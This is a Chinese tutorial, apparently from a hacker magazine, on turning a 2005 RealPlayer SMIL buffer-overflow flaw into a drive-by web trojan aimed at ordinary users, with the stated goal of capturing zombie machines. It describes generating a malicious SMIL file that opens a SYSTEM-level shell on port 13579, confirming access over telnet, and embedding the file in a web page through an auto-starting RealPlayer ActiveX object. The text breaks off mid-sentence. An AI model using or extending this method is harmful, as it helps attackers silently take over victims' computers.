编写RealPlayer木马的思路

    非安全第6期陈莎莎写了篇文章<<通过p2p共享影视文件抓肉鸡>>，里边的抓肉鸡主要思路是在rm影音文件中插入网页木马的url链接，用户看影音文件到某个时段弹出网页木马的url。其实，利用REALPLAYER本身的漏洞，直接做成网页木马，让用户在看rm的时候直接中马是有更好的效果。因为这样一来，此漏洞利用是与IE无关了，而且打REALPLAYER补丁的人少之又少，成功率还是很高的。只要装有REALPLAYER或暴风影音支持smil格式等播放器的用户都会中招。  

    2005年3月份，REALPLAYER暴出安全漏洞，大体意思是：RealPlayer事一款媒体播放器。使用者可以以基于缓冲区溢出脆弱用协调的多媒体综合语言(smil)文件形式语法分析程序，这能允许一个存心不良的攻击者在一台脆弱的机器上运行任意的代码。受影响系统： Windows RealPlayer 10.5 (6.0.12.1040-1056)、Windows RealPlayer 10 、Windows RealOne Player v2 (6.0.11.853 - 872) 、 Windows RealOne Player v2 (6.0.11.818 - 840) 、Windows RealOne Player v1 、Windows RealPlayer 8 、Windows RealPlayer Enterprise 、Mac RealPlayer 10 (10.0.0.305 - 325) 、Mac RealOne Player 、Linux RealPlayer 10 、Linux Helix Player。从这个漏洞的描述上来看，也会明白这个网页木马的可怕之处。  

    恶意的smil文件生成器，网上有现成的代码。如图1所示，我用编译好的real.exe生成了1个1.smil文件。  
我本机装有暴风影音，打开这个1.smil，如图2所示。此时我本机就会开13579端口。netstat -an来看一下，再telnet本机13579端口试试，成功！如图3、图4所示。注意在图4中执行命令的时候，并没有回显，打完命令运行后才能看到结果的，是系统权限的。  
这个漏洞的利用方法大体就是这个样子。我们现在就是利用此漏洞来制做成网页木马，让用户打开网页后就会打开本机的13579端口。其实说白了，也就是如何在网页中调用生成的smil文件。什么是smil文件呢？也就是replayer连续播放影音文件的一种调用方法。举个简单的例子，如果想连续播放两首mp3，网页代码如下：    
★  
<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">  
<PARAM NAME="_ExtentX" VALUE="9313">  
<PARAM NAME="_ExtentY" VALUE="1588">  
<PARAM NAME="AUTOSTART" VALUE="-1">  
<PARAM NAME="SHUFFLE" VALUE="0">  
<PARAM NAME="PREFETCH" VALUE="0">  
<PARAM NAME="NOLABELS" VALUE="0">  
<PARAM NAME="SRC" VALUE="Real.smil">  
<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">  
<PARAM NAME="CONSOLE" VALUE="Clip">  
<PARAM NAME="LOOP" VALUE="1">  
<PARAM NAME="NUMLOOP">  
<PARAM NAME="CENTER">  
<PARAM NAME="MAINTAINASPECT" VALUE="0">  
</OBJECT>    
============================请把以上内容保存成htm或html文件  
Real.smil文件的内容：  
<smil>  
<head>  
<layout>  
<region id="oRegion" left="0" top="0" />  
</layout>  
</head>  
<body>  
<seq>  
<video region="oReal" src="001.mp3" />  
<video region="oReal" src="002.mp3" />  
</seq>  
</body>  
</smil>  
============================001.mp3和002.mp3（或其它媒体格式）与你保存的htm文件还有Real.smil